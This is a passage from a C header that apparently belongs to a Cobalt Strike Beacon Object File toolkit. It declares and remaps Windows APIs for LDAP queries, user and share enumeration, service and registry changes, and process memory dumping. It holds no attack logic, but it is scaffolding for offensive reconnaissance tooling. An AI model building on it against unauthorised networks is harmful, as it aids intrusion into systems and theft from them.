LPVOID hCAInfo, IN DWORD dwFlags, OUT LPVOID * phCertType); 378 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumCertTypes(IN DWORD dwFlags, OUT LPVOID * phCertType); 379 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumNextCertType(IN LPVOID hPrevCertType, OUT LPVOID * phCertType); 380 | DECLSPEC_IMPORT DWORD WINAPI CERTCLI$CACountCertTypes(IN LPVOID hCertType); 381 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACloseCertType(IN LPVOID hCertType); 382 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeProperty(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue); 383 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypePropertyEx(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT LPVOID *pPropertyValue); 384 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCertTypeProperty(IN LPVOID hCertType, IN PZPWSTR awszPropertyValue); 385 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeExtensionsEx(IN LPVOID hCertType, IN DWORD dwFlags, IN LPVOID pParam, OUT PCERT_EXTENSIONS * ppCertExtensions); 386 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCertTypeExtensions(IN LPVOID hCertType, IN PCERT_EXTENSIONS pCertExtensions); 387 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeFlagsEx(IN LPVOID hCertType, IN DWORD dwOption, OUT DWORD * pdwFlags); 388 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeExpiration(IN LPVOID hCertType, OUT OPTIONAL FILETIME * pftExpiration, OUT OPTIONAL FILETIME * pftOverlap); 389 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACertTypeGetSecurity(IN LPVOID hCertType, OUT PSECURITY_DESCRIPTOR * ppSD); 390 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeAccessRights(IN LPVOID hCertType, IN DWORD dwContext, OUT DWORD *pdwAccessRights); 391 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$caTranslateFileTimePeriodToPeriodUnits(IN FILETIME const *pftGMT, IN BOOL Flags, OUT DWORD *pcPeriodUnits, OUT LPVOID*prgPeriodUnits); 392 | */ 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | 404 | //dbghelp 405 | DECLSPEC_IMPORT WINBOOL WINAPI DBGHELP$MiniDumpWriteDump(HANDLE hProcess,DWORD ProcessId,HANDLE hFile,MINIDUMP_TYPE DumpType,CONST PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,CONST PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,CONST PMINIDUMP_CALLBACK_INFORMATION CallbackParam); 406 | 407 | //WLDAP32 408 | WINLDAPAPI LDAP* LDAPAPI WLDAP32$ldap_init(PSTR, ULONG); 409 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_bind_s(LDAP *ld,const PSTR dn,const PCHAR cred,ULONG method); 410 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_search_s(LDAP *ld,PSTR base,ULONG scope,PSTR filter,PZPSTR attrs,ULONG attrsonly,PLDAPMessage *res); 411 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_entries(LDAP*,LDAPMessage*); 412 | WINLDAPAPI struct berval **LDAPAPI WLDAP32$ldap_get_values_lenA (LDAP *ExternalHandle,LDAPMessage *Message,const PCHAR attr); 413 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free_len(struct berval **vals); 414 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_set_optionA(LDAP *ld,int option,const void *invalue); 415 | WINLDAPAPI PLDAPSearch LDAPAPI WLDAP32$ldap_search_init_pageA(PLDAP ExternalHandle,const PCHAR DistinguishedName,ULONG ScopeOfSearch,const PCHAR SearchFilter,PCHAR AttributeList[],ULONG AttributesOnly,PLDAPControlA *ServerControls,PLDAPControlA *ClientControls,ULONG PageTimeLimit,ULONG TotalSizeLimit,PLDAPSortKeyA *SortKeys); 416 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_paged_count(PLDAP ExternalHandle,PLDAPSearch SearchBlock,ULONG *TotalCount,PLDAPMessage Results); 417 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_next_page_s(PLDAP ExternalHandle,PLDAPSearch SearchHandle,struct l_timeval *timeout,ULONG PageSize,ULONG *TotalCount,LDAPMessage **Results); 418 | 419 | WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_first_entry(LDAP *ld,LDAPMessage *res); 420 | WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_next_entry(LDAP*,LDAPMessage*); 421 | WINLDAPAPI PCHAR LDAPAPI WLDAP32$ldap_first_attribute(LDAP *ld,LDAPMessage *entry,BerElement **ptr); 422 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_values(PCHAR); 423 | WINLDAPAPI PCHAR * LDAPAPI WLDAP32$ldap_get_values(LDAP *ld,LDAPMessage *entry,const PSTR attr); 424 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free(PCHAR *); 425 | WINLDAPAPI PCHAR LDAPAPI WLDAP32$ldap_next_attribute(LDAP *ld,LDAPMessage *entry,BerElement *ptr); 426 | WINLDAPAPI VOID LDAPAPI WLDAP32$ber_free(BerElement *pBerElement,INT fbuf); 427 | WINLDAPAPI VOID LDAPAPI WLDAP32$ldap_memfree(PCHAR); 428 | 429 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind(LDAP*); 430 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind_s(LDAP*); 431 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_msgfree(LDAPMessage*); 432 | 433 | //RPCRT4 434 | RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$UuidToStringA(UUID *Uuid,RPC_CSTR *StringUuid); 435 | RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$RpcStringFreeA(RPC_CSTR *String); 436 | 437 | //PSAPI 438 | DECLSPEC_IMPORT WINBOOL WINAPI PSAPI$EnumProcessModulesEx(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded, DWORD dwFilterFlag); 439 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize); 440 | 441 | //VERSION 442 | DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeA(LPCSTR lptstrFilenamea ,LPDWORD lpdwHandle); 443 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); 444 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 445 | 446 | 447 | 448 | #else 449 | 450 | 451 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 452 | #define intRealloc(ptr, size) (ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ptr, size) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 453 | #define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr) 454 | #define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size) 455 | 456 | #define KERNEL32$VirtualAlloc VirtualAlloc 457 | #define KERNEL32$VirtualFree VirtualFree 458 | #define KERNEL32$LocalAlloc LocalAlloc 459 | #define KERNEL32$LocalFree LocalFree 460 | #define KERNEL32$HeapAlloc HeapAlloc 461 | #define KERNEL32$HeapReAlloc HeapReAlloc 462 | #define KERNEL32$GetProcessHeap GetProcessHeap 463 | #define KERNEL32$HeapFree HeapFree 464 | #define Kernel32$FormatMessageA FormatMessageA 465 | #define Kernel32$WideCharToMultiByte WideCharToMultiByte 466 | #define KERNEL32$FileTimeToLocalFileTime FileTimeToLocalFileTime 467 | #define KERNEL32$FileTimeToSystemTime FileTimeToSystemTime 468 | #define KERNEL32$GetDateFormatW GetDateFormatW 469 | #define KERNEL32$GetSystemTimeAsFileTime GetSystemTimeAsFileTime 470 | #define KERNEL32$GetLocalTime GetLocalTime 471 | #define KERNEL32$SystemTimeToFileTime SystemTimeToFileTime 472 | #define KERNEL32$SystemTimeToTzSpecificLocalTime SystemTimeToTzSpecificLocalTime 473 | #define KERNEL32$GlobalMemoryStatusEx GlobalMemoryStatusEx 474 | #define KERNEL32$GetDiskFreeSpaceExA GetDiskFreeSpaceExA 475 | #define KERNEL32$GetCurrentProcess GetCurrentProcess 476 | #define KERNEL32$GetCurrentProcessId GetCurrentProcessId 477 | #define KERNEL32$GetLastError GetLastError 478 | #define KERNEL32$CloseHandle CloseHandle 479 | #define KERNEL32$CreateThread CreateThread 480 | #define KERNEL32$GetTickCount GetTickCount 481 | #define KERNEL32$GetTickCount64 GetTickCount64 482 | #define KERNEL32$CreateFiber CreateFiber 483 | #define KERNEL32$ConvertThreadToFiber ConvertThreadToFiber 484 | #define KERNEL32$ConvertFiberToThread ConvertFiberToThread 485 | #define KERNEL32$DeleteFiber DeleteFiber 486 | #define KERNEL32$SwitchToFiber SwitchToFiber 487 | #define KERNEL32$WaitForSingleObject WaitForSingleObject 488 | #define KERNEL32$Sleep Sleep 489 | #define KERNEL32$DeleteFileW DeleteFileW 490 | #define KERNEL32$CreateFileW CreateFileW 491 | #define KERNEL32$GetFileSize GetFileSize 492 | #define KERNEL32$ReadFile ReadFile 493 | #define KERNEL32$OpenProcess OpenProcess 494 | #define KERNEL32$GetComputerNameExW GetComputerNameExW 495 | #define KERNEL32$lstrlenW lstrlenW 496 | #define KERNEL32$lstrcatW lstrcatW 497 | #define KERNEL32$lstrcpynW lstrcpynW 498 | #define KERNEL32$GetFullPathNameW GetFullPathNameW 499 | #define KERNEL32$GetFileAttributesW GetFileAttributesW 500 | #define KERNEL32$GetCurrentDirectoryW GetCurrentDirectoryW 501 | #define KERNEL32$FindFirstFileW FindFirstFileW 502 | #define KERNEL32$FindNextFileW FindNextFileW 503 | #define KERNEL32$FindFirstFileA FindFirstFileA 504 | #define KERNEL32$FindNextFileA FindNextFileA 505 | #define KERNEL32$FindClose FindClose 506 | #define KERNEL32$SetLastError SetLastError 507 | #define KERNEL32$HeapAlloc HeapAlloc 508 | #define KERNEL32$HeapReAlloc HeapReAlloc 509 | #define KERNEL32$HeapFree HeapFree 510 | #define MSVCRT$memset memset 511 | #define KERNEL32$GlobalAlloc GlobalAlloc 512 | #define KERNEL32$GlobalFree GlobalFree 513 | #define KERNEL32$GetEnvironmentStrings GetEnvironmentStrings 514 | #define KERNEL32$FreeEnvironmentStringsA FreeEnvironmentStringsA 515 | #define KERNEL32$ExpandEnvironmentStringsW ExpandEnvironmentStringsW 516 | #define KERNEL32$CreateToolhelp32Snapshot CreateToolhelp32Snapshot 517 | #define KERNEL32$Process32First Process32First 518 | #define KERNEL32$Process32Next Process32Next 519 | #define KERNEL32$Module32First Module32First 520 | #define KERNEL32$Module32Next Module32Next 521 | #define KERNEL32$LoadLibraryA LoadLibraryA 522 | #define KERNEL32$GetProcAddress GetProcAddress 523 | #define KERNEL32$FreeLibrary FreeLibrary 524 | #define KERNEL32$lstrlenA lstrlenA 525 | #define KERNEL32$GetLocaleInfoEx GetLocaleInfoEx 526 | #define KERNEL32$GetSystemDefaultLocaleName GetSystemDefaultLocaleName 527 | #define KERNEL32$LocaleNameToLCID LocaleNameToLCID 528 | #define KERNEL32$GetDateFormatEx GetDateFormatEx 529 | 530 | #define WTSAPI32$WTSEnumerateSessionsA WTSEnumerateSessionsA 531 | #define WTSAPI32$WTSQuerySessionInformationA WTSQuerySessionInformationA 532 | #define WTSAPI32$WTSFreeMemory WTSFreeMemory 533 | #define IPHLPAPI$GetAdaptersInfo GetAdaptersInfo 534 | #define IPHLPAPI$GetAdaptersInfo GetAdaptersInfo 535 | #define IPHLPAPI$GetIpForwardTable GetIpForwardTable 536 | #define IPHLPAPI$GetNetworkParams GetNetworkParams 537 | #define IPHLPAPI$GetUdpTable GetUdpTable 538 | #define IPHLPAPI$GetTcpTable GetTcpTable 539 | #define IPHLPAPI$GetIpNetTable GetIpNetTable 540 | #define MSVCRT$calloc calloc 541 | #define MSVCRT$memcpy memcpy 542 | #define MSVCRT$memcmp memcmp 543 | #define MSVCRT$realloc realloc 544 | #define MSVCRT$free free 545 | #define MSVCRT$memset memset 546 | #define MSVCRT$sprintf sprintf 547 | #define MSVCRT$vsnprintf vsnprintf 548 | #define MSVCRT$_snwprintf _snwprintf 549 | #define MSVCRT$wcscpy_s wcscpy_s 550 | #define MSVCRT$wcslen wcslen 551 | #define MSVCRT$wcstombs wcstombs 552 | #define MSVCRT$sprintf sprintf 553 | #define MSVCRT$wcscmp wcscmp 554 | #define MSVCRT$wcstok wcstok 555 | #define MSVCRT$wcstok_s wcstok_s 556 | #define MSVCRT$wcsstr wcsstr 557 | #define MSVCRT$wcscat wcscat 558 | #define MSVCRT$wcsncat wcsncat 559 | #define MSVCRT$wcscpy wcscpy 560 | #define MSVCRT$_wcsicmp _wcsicmp 561 | #define MSVCRT$wcschr wcschr 562 | #define MSVCRT$wcsncat wcsncat 563 | #define MSVCRT$wcsrchr wcsrchr 564 | #define MSVCRT$wcsrchr wcsrchr 565 | #define MSVCRT$wcstoul wcstoul 566 | #define MSVCRT$strcat strcat 567 | #define MSVCRT$strnlen strnlen 568 | #define MSVCRT$strlen strlen 569 | #define MSVCRT$strcmp strcmp 570 | #define MSVCRT$strncmp strncmp 571 | #define MSVCRT$_stricmp _stricmp 572 | #define MSVCRT$strcpy strcpy 573 | #define MSVCRT$strstr strstr 574 | #define MSVCRT$strchr strchr 575 | #define MSVCRT$strtok strtok 576 | #define MSVCRT$strtok_s strtok_s 577 | #define MSVCRT$strtoul strtoul 578 | #define DNSAPI$DnsQuery_A DnsQuery_A 579 | #define DNSAPI$DnsFree DnsFree 580 | #define WSOCK32$inet_addr inet_addr 581 | #define WS2_32$closesocket closesocket 582 | #define WS2_32$connect connect 583 | #define WS2_32$freeaddrinfo freeaddrinfo 584 | #define WS2_32$getaddrinfo getaddrinfo 585 | #define WS2_32$htonl htonl 586 | #define WS2_32$htons htons 587 | #define WS2_32$inet_ntoa inet_ntoa 588 | #define WS2_32$ioctlsocket ioctlsocket 589 | #define WS2_32$select select 590 | #define WS2_32$socket socket 591 | #define WS2_32$__WSAFDIsSet __WSAFDIsSet 592 | #define WS2_32$WSAGetLastError WSAGetLastError 593 | #define NETAPI32$DsGetDcNameA DsGetDcNameA 594 | #define NETAPI32$NetUserGetInfo NetUserGetInfo 595 | #define NETAPI32$NetUserModalsGet NetUserModalsGet 596 | #define NETAPI32$NetServerEnum NetServerEnum 597 | #define NETAPI32$NetUserGetGroups NetUserGetGroups 598 | #define NETAPI32$NetUserGetLocalGroups NetUserGetLocalGroups 599 | #define NETAPI32$NetApiBufferFree NetApiBufferFree 600 | #define NETAPI32$NetGetAnyDCName NetGetAnyDCName 601 | #define NETAPI32$NetUserEnum NetUserEnum 602 | #define NETAPI32$NetGroupGetUsers NetGroupGetUsers 603 | #define NETAPI32$NetQueryDisplayInformation NetQueryDisplayInformation 604 | #define NETAPI32$NetLocalGroupEnum NetLocalGroupEnum 605 | #define NETAPI32$NetLocalGroupGetMembers NetLocalGroupGetMembers 606 | #define NETAPI32$NetUserSetInfo NetUserSetInfo 607 | #define NETAPI32$NetShareEnum NetShareEnum 608 | #define NETAPI32$NetWkstaUserEnum NetWkstaUserEnum 609 | #define NETAPI32$NetWkstaGetInfo NetWkstaGetInfo 610 | #define NETAPI32$NetStatisticsGet NetStatisticsGet 611 | #define NETAPI32$NetApiBufferFree NetApiBufferFree 612 | #define NETAPI32$NetSessionEnum NetSessionEnum 613 | #define MPR$WNetOpenEnumW WNetOpenEnumW 614 | #define MPR$WNetEnumResourceW WNetEnumResourceW 615 | #define MPR$WNetCloseEnum WNetCloseEnum 616 | #define MPR$WNetGetNetworkInformationW WNetGetNetworkInformationW 617 | #define MPR$WNetGetConnectionW WNetGetConnectionW 618 | #define MPR$WNetGetResourceInformationW WNetGetResourceInformationW 619 | #define MPR$WNetGetUserW WNetGetUserW 620 | #define MPR$WNetAddConnection2W WNetAddConnection2W 621 | #define MPR$WNetCancelConnection2W WNetCancelConnection2W 622 | #define USER32$EnumDesktopWindows EnumDesktopWindows 623 | #define USER32$IsWindowVisible IsWindowVisible 624 | #define USER32$GetWindowTextA GetWindowTextA 625 | #define USER32$GetClassNameA GetClassNameA 626 | #define USER32$CharPrevW CharPrevW 627 | #define USER32$FindWindowExA FindWindowExA 628 | #define USER32$SendMessageA SendMessageA 629 | #define USER32$GetWindowTextA GetWindowTextA 630 | #define USER32$GetClassNameA GetClassNameA 631 | #define USER32$EnumChildWindows EnumChildWindows 632 | #define SECUR32$GetUserNameExA GetUserNameExA 633 | #define SHLWAPI$StrStrIA StrStrIA 634 | #define SHLWAPI$SHFormatDateTimeA SHFormatDateTimeA 635 | #define ADVAPI32$OpenProcessToken OpenProcessToken 636 | #define ADVAPI32$GetTokenInformation GetTokenInformation 637 | #define ADVAPI32$ConvertSidToStringSidA ConvertSidToStringSidA 638 | #define ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW ConvertStringSecurityDescriptorToSecurityDescriptorW 639 | #define ADVAPI32$LookupAccountSidA LookupAccountSidA 640 | #define ADVAPI32$LookupAccountSidW LookupAccountSidW 641 | #define ADVAPI32$LookupPrivilegeNameA LookupPrivilegeNameA 642 | #define ADVAPI32$LookupPrivilegeDisplayNameA LookupPrivilegeDisplayNameA 643 | #define ADVAPI32$OpenSCManagerA OpenSCManagerA 644 | #define ADVAPI32$OpenServiceA OpenServiceA 645 | #define ADVAPI32$QueryServiceStatus QueryServiceStatus 646 | #define ADVAPI32$QueryServiceConfigA QueryServiceConfigA 647 | #define ADVAPI32$CloseServiceHandle CloseServiceHandle 648 | #define ADVAPI32$EnumServicesStatusExA EnumServicesStatusExA 649 | #define ADVAPI32$QueryServiceStatusEx QueryServiceStatusEx 650 | #define ADVAPI32$QueryServiceConfig2A QueryServiceConfig2A 651 | #define ADVAPI32$ChangeServiceConfig2A ChangeServiceConfig2A 652 | #define ADVAPI32$ChangeServiceConfigA ChangeServiceConfigA 653 | #define ADVAPI32$CreateServiceA CreateServiceA 654 | #define ADVAPI32$DeleteService DeleteService 655 | #define ADVAPI32$RegOpenKeyExW RegOpenKeyExW 656 | #define ADVAPI32$EnumServicesStatusExW EnumServicesStatusExW 657 | #define ADVAPI32$RegCreateKeyA RegCreateKeyA 658 | #define ADVAPI32$RegSetValueExA RegSetValueExA 659 | #define ADVAPI32$RegOpenKeyExA RegOpenKeyExA 660 | #define ADVAPI32$RegConnectRegistryA RegConnectRegistryA 661 | #define ADVAPI32$RegCloseKey RegCloseKey 662 | #define ADVAPI32$RegOpenKeyA RegOpenKeyA 663 | #define ADVAPI32$RegCreateKeyExA RegCreateKeyExA 664 | #define ADVAPI32$RegDeleteKeyExA RegDeleteKeyExA 665 | #define ADVAPI32$RegDeleteKeyValueA RegDeleteKeyValueA 666 | #define ADVAPI32$RegQueryValueExA RegQueryValueExA 667 | #define ADVAPI32$RegQueryInfoKeyA RegQueryInfoKeyA 668 | #define ADVAPI32$RegEnumValueA RegEnumValueA 669 | #define ADVAPI32$RegEnumKeyExA RegEnumKeyExA 670 | #define ADVAPI32$RegDeleteValueA RegDeleteValueA 671 | #define ADVAPI32$RegQueryValueExW RegQueryValueExW 672 | #define ADVAPI32$RegSaveKeyExA RegSaveKeyExA 673 | #define ADVAPI32$GetFileSecurityW GetFileSecurityW 674 | #define ADVAPI32$GetSecurityDescriptorOwner GetSecurityDescriptorOwner 675 | #define ADVAPI32$GetSecurityDescriptorDacl GetSecurityDescriptorDacl 676 | #define ADVAPI32$GetAclInformation GetAclInformation 677 | #define ADVAPI32$GetAce GetAce 678 | #define ADVAPI32$LookupAccountSidW LookupAccountSidW 679 | #define ADVAPI32$ConvertSidToStringSidW ConvertSidToStringSidW 680 | #define ADVAPI32$MapGenericMask MapGenericMask 681 | #define ADVAPI32$OpenProcessToken OpenProcessToken 682 | #define ADVAPI32$GetTokenInformation GetTokenInformation 683 | #define ADVAPI32$InitializeSecurityDescriptor InitializeSecurityDescriptor 684 | #define ADVAPI32$SetSecurityDescriptorDacl SetSecurityDescriptorDacl 685 | #define ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW ConvertSecurityDescriptorToStringSecurityDescriptorW 686 | #define ADVAPI32$StartServiceA StartServiceA 687 | #define ADVAPI32$ControlService ControlService 688 | #define ADVAPI32$EnumDependentServicesA EnumDependentServicesA 689 | #define ADVAPI32$RegQueryInfoKeyA RegQueryInfoKeyA 690 | #define NTDLL$NtCreateFile NtCreateFile 691 | #define NTDLL$NtClose NtClose 692 | #define IMAGEHLP$ImageEnumerateCertificates ImageEnumerateCertificates 693 | #define IMAGEHLP$ImageGetCertificateHeader ImageGetCertificateHeader 694 | #define IMAGEHLP$ImageGetCertificateData ImageGetCertificateData 695 | #define CRYPT32$CryptVerifyMessageSignature CryptVerifyMessageSignature 696 | #define CRYPT32$CertGetNameStringW CertGetNameStringW 697 | #define CRYPT32$CertGetCertificateContextProperty CertGetCertificateContextProperty 698 | #define CRYPT32$CertCreateCertificateContext CertCreateCertificateContext 699 | #define CRYPT32$CertFreeCertificateContext CertFreeCertificateContext 700 | #define CRYPT32$CertGetCertificateChain CertGetCertificateChain 701 | #define CRYPT32$CertFreeCertificateChain CertFreeCertificateChain 702 | #define CRYPT32$CryptFindOIDInfo CryptFindOIDInfo 703 | #define WS2_32$InetNtopW InetNtopW 704 | #define WS2_32$inet_pton inet_pton 705 | #define DNSAPI$DnsFree DnsFree 706 | #define DNSAPI$DnsGetCacheDataTable DnsGetCacheDataTable 707 | #define OLE32$CoInitializeEx CoInitializeEx 708 | #define OLE32$CoUninitialize CoUninitialize 709 | #define OLE32$CoInitializeSecurity CoInitializeSecurity 710 | #define OLE32$CoCreateInstance CoCreateInstance 711 | #define OLE32$CLSIDFromString CLSIDFromString 712 | #define OLE32$IIDFromString IIDFromString 713 | #define OLE32$StringFromGUID2 StringFromGUID2 714 | #define OLE32$CoSetProxyBlanket CoSetProxyBlanket 715 | #define OLE32$CoTaskMemAlloc CoTaskMemAlloc 716 | #define OLE32$CoTaskMemFree CoTaskMemFree 717 | #define OLEAUT32$SysAllocString SysAllocString 718 | #define OLEAUT32$SysReAllocString SysReAllocString 719 | #define OLEAUT32$SysFreeString SysFreeString 720 | #define OLEAUT32$SysStringLen SysStringLen 721 | #define OLEAUT32$VariantInit VariantInit 722 | #define OLEAUT32$VariantClear VariantClear 723 | #define OLEAUT32$SysAddRefString SysAddRefString 724 | #define OLEAUT32$VariantChangeType VariantChangeType 725 | #define OLEAUT32$VarFormatDateTime VarFormatDateTime 726 | #define OLEAUT32$SafeArrayDestroy SafeArrayDestroy 727 | #define OLEAUT32$SafeArrayLock SafeArrayLock 728 | #define OLEAUT32$SafeArrayGetLBound SafeArrayGetLBound 729 | #define OLEAUT32$SafeArrayGetUBound SafeArrayGetUBound 730 | #define OLEAUT32$SafeArrayGetElement SafeArrayGetElement 731 | #define OLEAUT32$SafeArrayGetElemsize SafeArrayGetElemsize 732 | #define OLEAUT32$SafeArrayAccessData SafeArrayAccessData 733 | #define OLEAUT32$SafeArrayUnaccessData SafeArrayUnaccessData 734 | 735 | 736 | 737 | 738 | /* 739 | #define CERTCLI$CAEnumFirstCA CAEnumFirstCA 740 | #define CERTCLI$CAEnumNextCA CAEnumNextCA 741 | #define CERTCLI$CACloseCA CACloseCA 742 | #define CERTCLI$CACountCAs CACountCAs 743 | #define CERTCLI$CAGetDN CAGetDN 744 | #define CERTCLI$CAGetCAProperty CAGetCAProperty 745 | #define CERTCLI$CAFreeCAProperty CAFreeCAProperty 746 | #define CERTCLI$CAGetCAFlags CAGetCAFlags 747 | #define CERTCLI$CAGetCACertificate CAGetCACertificate 748 | #define CERTCLI$CAGetCAExpiration CAGetCAExpiration 749 | #define CERTCLI$CAGetCASecurity CAGetCASecurity 750 | #define CERTCLI$CAGetAccessRights CAGetAccessRights 751 | #define CERTCLI$CAEnumCertTypesForCA CAEnumCertTypesForCA 752 | #define CERTCLI$CAEnumCertTypes CAEnumCertTypes 753 | #define CERTCLI$CAEnumNextCertType CAEnumNextCertType 754 | #define CERTCLI$CACountCertTypes CACountCertTypes 755 | #define CERTCLI$CACloseCertType CACloseCertType 756 | #define CERTCLI$CAGetCertTypeProperty CAGetCertTypeProperty 757 | #define CERTCLI$CAGetCertTypePropertyEx CAGetCertTypePropertyEx 758 | #define CERTCLI$CAFreeCertTypeProperty CAFreeCertTypeProperty 759 | #define CERTCLI$CAGetCertTypeExtensionsEx CAGetCertTypeExtensionsEx 760 | #define CERTCLI$CAFreeCertTypeExtensions CAFreeCertTypeExtensions 761 | #define CERTCLI$CAGetCertTypeFlagsEx CAGetCertTypeFlagsEx 762 | #define CERTCLI$CAGetCertTypeExpiration CAGetCertTypeExpiration 763 | #define CERTCLI$CACertTypeGetSecurity CACertTypeGetSecurity 764 | #define CERTCLI$CAGetCertTypeAccessRights CAGetCertTypeAccessRights 765 | #define CERTCLI$caTranslateFileTimePeriodToPeriodUnits caTranslateFileTimePeriodToPeriodUnits 766 | */ 767 | 768 | 769 | 770 | #define DBGHELP$MiniDumpWriteDump MiniDumpWriteDump 771 | #define WLDAP32$ldap_init ldap_init 772 | #define WLDAP32$ldap_bind_s ldap_bind_s 773 | #define WLDAP32$ldap_search_s ldap_search_s 774 | #define WLDAP32$ldap_count_entries ldap_count_entries 775 | #define WLDAP32$ldap_get_values_lenA ldap_get_values_lenA 776 | #define WLDAP32$ldap_value_free_len ldap_value_free_len 777 | #define WLDAP32$ldap_set_optionA ldap_set_optionA 778 | #define WLDAP32$ldap_search_init_pageA ldap_search_init_pageA 779 | #define WLDAP32$ldap_get_paged_count ldap_get_paged_count 780 | #define WLDAP32$ldap_get_next_page_s ldap_get_next_page_s 781 | #define WLDAP32$ldap_first_entry ldap_first_entry 782 | #define WLDAP32$ldap_next_entry ldap_next_entry 783 | #define WLDAP32$ldap_first_attribute ldap_first_attribute 784 | #define WLDAP32$ldap_count_values ldap_count_values 785 | #define WLDAP32$ldap_get_values ldap_get_values 786 | #define WLDAP32$ldap_value_free ldap_value_free 787 | #define WLDAP32$ldap_next_attribute ldap_next_attribute 788 | #define WLDAP32$ber_free ber_free 789 | #define WLDAP32$ldap_memfree ldap_memfree 790 | #define WLDAP32$ldap_unbind ldap_unbind 791 | #define WLDAP32$ldap_unbind_s ldap_unbind_s 792 | #define WLDAP32$ldap_msgfree ldap_msgfree 793 | #define RPCRT4$UuidToStringA UuidToStringA 794 | #define RPCRT4$RpcStringFreeA RpcStringFreeA 795 | #define PSAPI$EnumProcessModulesEx EnumProcessModulesEx 796 | #define PSAPI$GetModuleFileNameExA GetModuleFileNameExA 797 | #define VERSION$GetFileVersionInfoSizeA GetFileVersionInfoSizeA 798 | #define VERSION$GetFileVersionInfoA GetFileVersionInfoA 799 | #define VERSION$VerQueryValueA VerQueryValueA 800 | #define BeaconPrintf(x, y, ...) printf(y, ##__VA_ARGS__) 801 | #define internal_printf printf 802 | #endif --------------------------------------------------------------------------------